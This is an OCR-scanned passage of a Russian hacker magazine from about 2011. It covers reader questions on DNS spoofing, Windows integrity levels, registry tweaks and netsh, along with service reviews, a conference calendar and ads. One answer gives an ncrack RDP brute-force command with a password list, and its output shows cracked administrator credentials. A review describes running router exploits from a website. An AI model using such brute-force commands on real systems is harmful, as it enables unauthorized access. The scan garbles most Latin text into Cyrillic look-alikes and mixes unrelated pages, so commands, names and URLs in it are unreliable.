РакейМБ ( ЬіЫѵ/згЦРХІ ). 

Тулза входит в большой набор про- 
грамм для анализа малвари Маісобе 
Апаіузіз Раск. Как и АраІеОЫЗ, она работает 
только под виндой и отвечает на все 0Ы5- 
запросы, подсовывая заранее прописанный 
ІР-адрес. Все перехваченные данные (за- 
просы и ответы) можно посмотреть в НЕХ- 
представлении. 



{акесіпз.ру ( ЫЬІѵА/ЬдатС ). 

Этот скрипт для спуфинга 0Ы5- 
ответов написан на РуіЬоп (чуть боль- 
ше 40 строчек кода) и потому будет работать 
подлюбой ОС. Поумолчанию в качестве ІР- 
адреса в любом запросе задается адрес хоста, 
на котором запущен (акесіпз.ру, но с помощью 
параметров запуска можно указать любой 
другой айпишник. 



НозІзМап ( ЬіЫѵ/и4АѴ0Х ). 

Эта программа не предназначена для 
спуфинга ОЫЗ-ответов, но предостав- 
ляет отличный интерфейс для редактирования 
файла Ьо5І5. Она позволяет настроить автома- 
тическое обновления конфига или, например, 
удалить из файла дублирующие друг друга за- 
писи. Хотя, конечно, в 99% случаев достаточно 
и обычного блокнота. :) 
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иштБ/РАОіімтЕО 



□ КАК ПОМЕНЯТЬ СТАНДАРТНЫЙ 
МЕНЕДЖЕР ЗАДАЧ НА КАКОЙ- 
НИБУДЬ НА БОЛЕЕ ПРОДВИНУТЫЙ, 
КОТОРЫЙ СРАЗУ БЫ ВЫСКАКИВАЛ 
ПО ПРИВЫЧНОМУХОТКЕЮ СТРЬ + 5НІЕТ + 
Е5С? 



□ В меню продвинутых таскменеджеров 
вроде Ргосезз Ехріогег от Марка 
Руссиновича ( ЬіГІѵ/идЕРрх ) есть опция Реріасе 
Тазк Мападег, с помощью которой его можно 
сделать менеджером задач по умолчанию. Что- 
бы провернуть эту операцию вручную, нужно 
поправить следующую ветку в реестре: 



НКЕУ_ЮСАІ_МАСНІМЕ\$0РТЫАКЕ\Місгозо-Р1:\ 
І л ііпбомз МТ\Сиггеп1:Ѵег5 І оп \І та§е Рііе 
ЕхесиТіоп ОрТіопзХІіазкт^г . ехе 



Если раздела с названием Іазктдг.ехе 
не будет, создай его сам. Затем необходимо до- 
бавить строковый параметр РеЬиддег и в каче- 
стве его значения прописать путь до исполняе- 
мого файла нового таскменеджера (например, 
с:\и1іІз\Ргосез5 ЕхрІогег\ргосехр.ехе). 



КОТОРЫЕ ПЕРЕДАЮТСЯ МЕЖДУ 
БРАУЗЕРОМ И ВЕБ-ПРИЛОЖЕНИЕМ 
ЧЕРЕЗ ѴѴЕВ50СКЕТ? 



ПОДСКАЖИ УДОБНЫЙ СПОСОБ 
ДЛЯ ПРОСМОТРА ДАННЫХ, 



□ Сам недавно столкнулся с такой 

задачей. Пришел к выводу, что есть два 
основных варианта: 

1. Использовать инструмент, который удобен 
для просмотра любого сетевого трафи- 
ка, — ѴѴігезЬагМ ѵѵѵѵѵѵ.ѵѵігезЬагк.огд ГТьі 

легко сможешь мониторить любые данные, 
которые передаются как по ѴѴеЬ5оске1з,так 
и по любым другим протоколам, работающим 
поверх НТТР (например, 50АР]. 

2 . Воспользоваться расширением для Рігеіох 
— Тетрег йаіа ( ЫЫу/зМ49Нк ). которое 
позволяет не только посмотреть да иные, 
но и изменить их на лету. 



N и выше. Звучит страшно, но на самом деле 
все очень просто. Файлам процесса можно 
назначитьтри метки доверия: Ьоѵѵ, Месііа 
и НідЬ. Все процессы, даже из-под аккаунта 
администратора, по умолчанию запускаются 
с уровнем Месііііт (средний обязательный 
уровень в локализованной ОС). Правда, под 
стандартным таскменеджером ты этого 
не увидишь. Придется поставить Ргосезз 
Ехріогег и добавить для отображения 
соответствующий столбец (Ѵіеѵѵ -> Зеіесі 
Соіитпз -> Іпіедгііу ЬеѵеІ). Но главный вопрос 

— зачем это нужно? Предположим, в систему 
каким-то образом попала малварь, которая 
работает в изегтосіе. Она легко может 
инжектироваться, например, в процесс, 
КееРазз и перехватить все пароли, которые 
ты старательно сохраняешь в этой замеча- 
тельной тулзе, чтобы она их надежно 
шифровала. В итоге все пароли окажутся 

у злоумышленника. Все из-за того, что 
у КееРазз и кейлоггера был одинаковый — 
средний — уровень доверия. Если бы мы 
заранее подняли уровень доверия КеуРазз 
до НідЬ, то кейлоггер уже не смог бы добрать- 
ся до этого процесса. Профит! Установить 
высокий уровень доверия какому-нибудь 
приложению (тому же КеуРазз) очень просто 

— его лишь необходимо запустить через 
механизм Рип аз абтіпізігаіог. Хотя, конечно, 
это не спасет от более серьезной малвари, 
которая работает на уровне ядра. Но это 
хороший пример, иллюстрирующий возмож- 
ности дополнительной системы разграниче- 
ния доступа. 

ѴѴіпбоѵѵз Іпіедгііу Ьеѵеіз можно использо- 
вать и для дополнительной защиты файлов. 
Манипулировать с уровнями доверия позво- 
ляет и встроенная в систему утилита ісасіз, 
но есть хороший альтернативный вариант 
в виде СЬтІ ( ЬіІ.Іу/зОВЕСт ). К примеру, можно 
установить файлу высокий уровень доверия 
(ключ *Ч:Ь") и запретить приложениям с мень- 
шим уровнем его читать (ключ м -пг"): 

сііті біе. гір -і :б -пг 



В ЧЕМ ФИШКА ДОПОЛНИТЕЛЬНОГО 
МЕХАНИЗМАЗАЩИТЫ ѴѴІІ\Ю0ѴѴ5 
ІЫТЕОРІТУ ЬЕѴЕЬЗ? КАК МОЖНО ЕГО 
ИСПОЛЬЗОВАТЬ И НАСКОЛЬКО ЭТО 
ЦЕЛЕСООБРАЗНО? 

Одно из нововведений ѴѴіпсіоѵѵз Ѵізіа, 7 
и Зегѵег 2008, о котором мало кто 
говорит, — это тапбаіогу іпіедгііу Іеѵеіз (МП). 
Если говорить с точки зрения процессов, то 
Місгозоіі ввела дополнительные уровни 
доступа, чтобы ограничить приложения, 
которые запущены из-под одного и того же 
аккаунта, во взаимном доступе. Сейчас такие 
процессы могут беспрепятственно влиять 
друг на друга. В дополнение к традиционным 
системам контроля доступа появилось еще 
одно средство разграничения доступа, 
благодаря которому к объекту с уровнем N 
могут обращаться только объекты с уровнем 



Поскольку приложения по умолчанию за- 
гружаются со средним уровнем доверия, то об- 
ратиться к Іііе.гір они уже не смогут и получат 
сообщение Ассезз із бепіеб. 

□ ЕСТЬ ЛИ В ПАБЛИКЕ БЫСТРЫЙ 
БРУТФОРСЕР ДЛЯ РйР? 

□ Одной из первых рабочих утилит, 

предложивших нормальный брутфорс 
РОР-акков, была ТЗСгіпбег ( ЬіІ.Іѵ/иТЬрпЗ ). 

Но работает она очень медленно. Гораздо 
более эффективный перебор паролей 
предоставляет псгаск ( птар.ога/псгаск ) — 
разработанный создателями птар брутфорсер, 
по умолчанию имеющий модуль для РйР- 
брута. Выглядит его использование так: 

$ псгаск -ѵѵ -67 - -изег абтіпізІіга'Еог \ 
-Р /Ііоте/изег/раззіізі: .1x1: \ 





192 .168. 26. 137: 3389 ,СІ_=2 
псір: //192. 168. 26. 137:3389 (ЕІР 1) Ю^іп 
Таііесі: ' абтіпізІігаТог ' ' абтіп' 



Оізсоѵегеб сгебепТіаІз оп 

гсір : //192 . 168 . 26 . 137 : 3389 ' абтіпізТга- 

Тог' 'абтіп123' 



Пароль найден! 

□ ИСПОЛЬЗУЮ ОДИН И ТОТ ЖЕ 

НОУТБУК НА РАБОТЕ И ДОМА. ЕСТЬ 
ЛИ СПОСОБ БЫСТРО ПЕРЕКЛЮЧАТЬ 
СЕТЕВЫЕ КОНФИГУРАЦИИ БЕЗ 
ИСПОЛЬЗОВАНИЯ УТИЛИТ ВРОДЕ 
ЫЕТ5ЕТМАЫ ( УУУУУУ.ЫЕТЗЕТМАЫ.СОМ )? 




бштр: 



Сохранить все сетевые настройки 
можно через пеізб с помощью ключа 



пеіізіі іпТегТасе бшпр > пеіізіі-сопб^і.ііхі: 

В результате в конфиг в особой форме будут 
записаны настройки всех сетевых интерфей- 
сов: 



_ _ _ _ ___ _ _ ______ _ _ _ _ _ _ _______ 

# ІпТегТасе ІР Сопб^игаТіоп 

# 

ризы іпТегТасе ір 

# ІпІіепТасе ІР Сопб^ипаіііоп Тог "І_оса1 

Агеа СоппесТіо п ЛТ 

зеі: аббгезз пате="І_оса1 Агеа СоппесТіоп 
1" зо игсе=бІіср 

зеі: бпз пате="І_оса1 Агеа СоппесТіоп 1" 
зоигсе=бІіср ге§із1:ег=РКІМАКѴ 
зеТ ыіпз пате="1оса1 Агеа СоппесТіоп 1" 
зоигсе=бІіср 
рорб 

# Епб оТ іпІіегТасе ІР сопб^игаіііоп 



Чтобы применить настройки из файла, ис- 
пользуется команда пеізб -Г 

пеіізіі -Т пе1:5Іі-сопб§1 .ТхТ 

Соответственно, ты можешь создать два 
конфига и быстро переключаться между ними, 
сделав, к примеру, ярлычок для каждого 
конфига. 3-С 




РакеРМБ спуфит РЫБ-ответы. администратора». 
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ЫЬгеоНісе 3.4.4 ^о^^п іЬе 











ИеШеіег 1.1.4 6пирІо{ 4.4.4 БоЦБМЕРО Тіпсіа 1.3.1 

ИеМ/огх 5.2.1 НапсІЬгаке 0.9.5 ѲзазІ 1.6.1 Ѵеигг 1.14 

Роккі Ітадемадіск 6.7.3-8 НОРРЕР ѴМѵѵаге Ригіоп 4.1.1 

РасІіоСІіскег 8. 1 1 К9сору 2.3.7 ІрсІа55Ііу 1.1 ѴѴіпатр 0.7.1 







БУДЬ ХИТРЫМ! 



ХВАТИТ ПЕРЕПЛАЧИВАТЬ 
В КИОСКАХ! СЭКОНОМЬ 
800 РУБЛЕЙ НА ГОДОВОЙ 
ПОДПИСКЕ! 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 2200 РУБ. (ВКЛЮЧАЯ ДОСТАВКУ) 
ЭТО НА 23% ДЕШЕВЛЕ, 



ЧЕМ РЕКОМЕНДУЕМАЯ РОЗНИЧНАЯ ЦЕНА (250 РУБЛЕЙ ЗА НОМЕР) 

ЯНВАРСКИЙ НОМЕР— ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 
ФЕВРАЛЬСКИЙ НОМЕР — ПОДПИСАВШИСЬ ДО 31 ДЕКАБРЯ, 
МАРТОВСКИЙ НОМЕР — ПОДПИСАВШИСЬ ДО 31 ЯНВАРЯ. 



И ЭТО ЕЩЕ НЕ ВСЕ! 

ПОЛУЧИ В ПОДАРОК ОДИН ЖУРНАЛ ДРУГОЙ ТЕМАТИКИ! 









8 


.5 Г 
п\/г 






иуі 





Оформив годовую подписку в редакции, ты сможешь бесплатно получить один свежий 
номер любого журнала, издаваемого компанией «Гейм Лэнд»: 




Страна Игр 


Тюнинг 


Форсаж 


ТоіаІ РооіЬаІІ 


Тотал ОѴБ 


Свой бизнес 


БѴОХрегі 


+ ОѴО 


Автомобилей 




+ ОѴО 


+ ОѴБ 







Железо 
+ ОѴБ 



Зтоке 



НІЕЙ ^=3 

РИГ, ( 




тъ и а 




РС Игры Фотомастерская 

+ 2 ОѴБ + ОѴО 




Вышиваю 

крестиком 



Оідііаі РЬоіо 
+ ОѴО 



Хулиган 
+ ОѴО 



ВПИШИ В КУПОН НАЗВАНИЕ 
ВЫБРАННОГО ЖУРНАЛА, 
ЧТОБЫ ЗАКАЗАТЬ 
ПОДАРОЧНЫЙ НОМЕР. 









Подписка 



ГОДОВАЯ 
ЭКОНОМИЯ 

500 руб 



1. Разборчиво заполни подписной купон и кви- 
танцию, вырезав их из журнала, сделав ксе- 
рокопию или распечатав с сайта зЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• на е-таіі: зиЬзсгіЬеОдІс.ги; 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 15280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ 
ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ 
МОЖНО ОФОРМИТЬ С НОЯБРЯ. 



12 НОМЕРОВ — 2200 РУБ. 

6 НОМЕРОВ — 1260 РУБ. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ 
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ! 




ПРИ ПОДПИСКЕ 
НА КОМПЛЕКТ ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: — 

ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА 
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ 
ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 



ЕСТЬ ВОПРОСЫ? Пиши на піоісідіс.ги или звони по бесплатным телефо- 
нам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3-999 (для жителей 
других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 2011г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 





ІЖІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 




2ѴѴгге 
ЗСот 
А г Гій 



РОІІТЕРРѴѴМ 



ѵѵѵѵѵѵ.гоіЛегрѵѵп.сот 

Кладезь знаний по взлому различных роутеров, точек доступа и другого сетевого обо- 
рудования. На этом сайте есть несколько сервисов, в том числе тас_ЛпсІ (определение 
производителя по МАС-адресу) и рЬепоеІіІ (база данных используемых по умолчанию 
паролей для админок). Но главное — это структурированная информация о множестве 
уязвимостей в различных девайсах, рассортированная по вендорам. Кроме того, если 
для бага доступен сплоит, то его можно попробовать в действии прямо с сайта, просто 
задав ІР-адрес роутера. Помни, что всю информацию можно использовать только для 
легальных тестов на проникновение :). 



Сервис для взлома сетевого оборудования 




КІСК5ЕЫ0 



кіскзепсі.сопп 

Классный сервис, который избавит тебя от необходимости иметь дело с помойками 
вроде РарісІзЬаге и другими файловыми хостингами, если нужно просто передать кому- 
то файл большого размера. Ты заливаешь файл через веб-интерфейс или с помощью 
специального десктопного приложения, а адресат получает по е-таіі ссылку для за- 
грузки. Идея в том, что весь процесс максимально упрощен, поэтому сервис можно не 
только использовать самому, но и рекомендовать, когда тебя спрашивают: «А как бы 
мне по е-таіі отправить 500 Мб данных?» Правда, стоит учитывать, что лимит на пере- 
дачу составляет 1 Гб. Больше — за денежку. 



Сервис для простой передачи файлов 




РРЮХРЫ 



ргохрп.сот 

Единственное, что предоставляет ргоХРІМ, — это удобную опе-сііск-программу для 
работы через ѴРІ\І-сервер ресурса. По сути, это надстройка над широко известным 
ОрепѴРІМ, которая упрощает установку, подключение и переключение между сервера- 
ми, находящимися в разных странах. Самое интересное, что ты можешь использовать 
ргоХРЫ совершенно бесплатно. Да, здесь есть ограничения по скорости. Да, здесь есть 
ограничения по трафику. Но если нужно обезопасить себя в незащищенной сети (ска- 
жем, при подключении к открытому ѴѴіРі-хотспоту), то это отличный вариант шифровать 
весь свой трафик. 



Сервис для бесплатного ѴРЫ-доступа 




ЭРС 2 



]рс2.сот 

Если бы этот сервис нужно было описать одной фразой, то его следовало бы назвать 
«сервисом для виртуализации в вебе». Мы не так давно рассказывали о проекте 
^ѵазсгірі РС Етіііаіог ( ЬеІІагсІ.огдДзІіпих ), представляющем собой виртуальную машину 
(полностью реализованную на ^ѵаБсгірі), на которой запущен простейший Ыпих. Сер- 
вис 2 также является виртуальной машиной, правда, он написан на ^ѵа и позво- 
ляет запускать вполне привычные ОС: ѴѴіпсІоѵѵз ХР и ІІЬипІи — прямо в окне браузера. 
Просто заходишь на )рс2.сот, выбираешь ОС и начинаешь с ней работу. Скорость пока 
не впечатляет, хотя сам концепт радует. 
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ІЖІТ5/6ЕЕК АРТ 




Фотограф: Ексей Пантелеев. Модель: Екатерина Валуйская. 



ІЖІТ5/ КАЛЕНДАРЬ 2012 



ГЛАВНЫЕ СОБЫТИЯ КІѴ2К+12 



ВОСЕМЬ ЛУЧШИХ ХАКЕРСКИХ МЕРО- 
ПРИЯТИЙ НОВОГО ГОДА. М05Т5ЕЕ И ПО 
ВОЗМОЖНОСТИ М05ТѴІ5ІТ ДЛЯ ВСЕХ, 
КТО ИНТЕРЕСУЕТСЯ ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТЬЮ. 



Мы составили этот мини-календарыаким образом, чтобы он был максимально инте- 
ресен российской аудитории. Пол овина из представленных мероприятий проходит в 
России и посетить их очень просто и дешево: было бы желание. Другая половина — это 
ведущие международные конференции, на которые очень круто съездить и за ходом 
которых очень интересно следить. 



20-23 февраля 



■\ г 



Игъ 

ІТГгр" 



14-16 марта 




■\ г 



30-31 мая 




НІТВ 

Мумбай 

сопіегепсе.НИЬ.огд 

Брюс Шнайер, Федор Ярочкин, 
Шрирай Шах, Дидье Стивенс 
и многие другие крутыши уже 
участвовали в этой моло- 
дой конференции, которая 
проходит в самых разных, 
преимущественно азиатских, 
городах. 



ВІ.АСКНАТ 

Амстердам 

ѵѵѵѵѵѵ.ЫаскЬаі.сот 

Европейский филиал лучшей 
хакерской конференции в 
мире. Самые интересные до- 
клады, тысячи единомышлен- 
ников и прекрасный город, 
способствующий творческому 
настроению. 



РНБАѴ5 

Москва 

ѵѵѵѵѵѵ.рМауа.ги 

Год назад РГЮАѴ5 стала 
первой полноценной ИБ 
конференцией в России. 
Ждем продолжения, которое 
должно быть еще интерес- 
нее. К слову, организаторы 
уже анонсировали отбороч- 
ные СТР-соревнования. 



У V 



У V 



( \ 

26-29 июля 




ОЕРСОЫ 

Лас-Вегас 

ѵѵѵѵѵѵ.сІеГсоп.огд 

Юбилейный, 20-й по счету 
Дефкон наверянка должен 
пройти по-особенному. 
Впрочем, два обстоя- 
тельства точно никуда не 
денутся: это самое массовое 
хакерское мероприятие в 
самом злачном городе США! 



25-26 августа 




СС'2012 

Санкт-Петербург 

сс.ога.ги 

Компьютерный фестиваль с 
сіетозсепе-корнями. С него 
вообще по сути началась 
российская культура про- 
ведения оффлайновых меро- 
приятий для гиков. Посетить 
его хотя бы один раз в жизни 
определенно стоит. 



осень 2012 




2ЕК0ЫІ6НТ5 

Санкт-Петербург 

ѵѵѵѵѵѵ.гегопідНіа.ги 

Мероприятие впервые про- 
шло в этом году, но надо 
отдать должное: у организа- 
торов получилась прекрас- 
ная международная конфа, 
буквально переполненная 
интереснейшими докладами. 
Требуем продолжения! 




СОЫРЮЕІІСЕ 

Краков 

сопйііепсе.дгд. рі 

Молодая польская конфа при- 
влекает докладчиков шикар- 
ными условиями: оплачивают 
билеты, гостиницу, обильно 
и грамотно кормят и поят по 
ходу ивента. Судя по списку 
докладчиков, стратегия 
отлично работает :). 



г 



■\ 



весь год 




ОЕРСОЫ 

ІМ55ІА 

ѵѵѵѵѵу.сІеГсоп-гизБІа.ги 



В 2011 году уже состоялось 5 
встреч российской дефкон- 
группы. Каждый раз меропри- 
ятия проводились в офисах 
различных ІТ/ИБ-компаний, 
что добавляло интереса. Сле- 
дим за анонсами в новом году! 
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РЕКЛАМА 




♦ 




ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



Ш Мы зноем, где с мире пойти самые лучшие продукты. 

Вы знаете, что можете но йпінк родом» гкрдм^ксчіТАЗН 







АЗ II 5 рекомендует ѴѴіпсІоѵѵз® 7. 






РОЖДЕН БьІТЬ ЛУЧШИМ' 

Игровой ПК КОС Туіап - это флагманский боевой корабль, 
каждый элемент которого служит во имя победы. 



Мгновенное 

переключение 

между 

режимами 

Индикатор 
работы ЦП 
в режиме 
стандартной 
нагрузки 
и в режиме 
разгона 



Процессор Іпіеі® Соге™ Г7-2600К второго поколения, 
подлинная М/іп(Іош$® 7 Домашняя расширенная и топовая 
видеокарта ИѴЮІА® СеРогсе® 6ТХ 590 обеспечивают полное 
погружение в самые новейшие и требовательные к аппарат- 
ному обеспечению игры. 



□ІБГ 

ѴКМ 



V- 

ХОМАК 



Умный. 

И это видно. 



Скорость чтения Высочайшая Срок службы Качество звука 

и записи выше в 4 раза надежность в 2 раза дольше в 35 раз выше 



Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесйоп 



Спрашивайте в магазинах сети Берингов 
Материнские платы А$Ц$ - самые награждаемые и покупаемые в мире 

Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации ІпТеІ на территории США и других стран. 
На правах рекламы. 




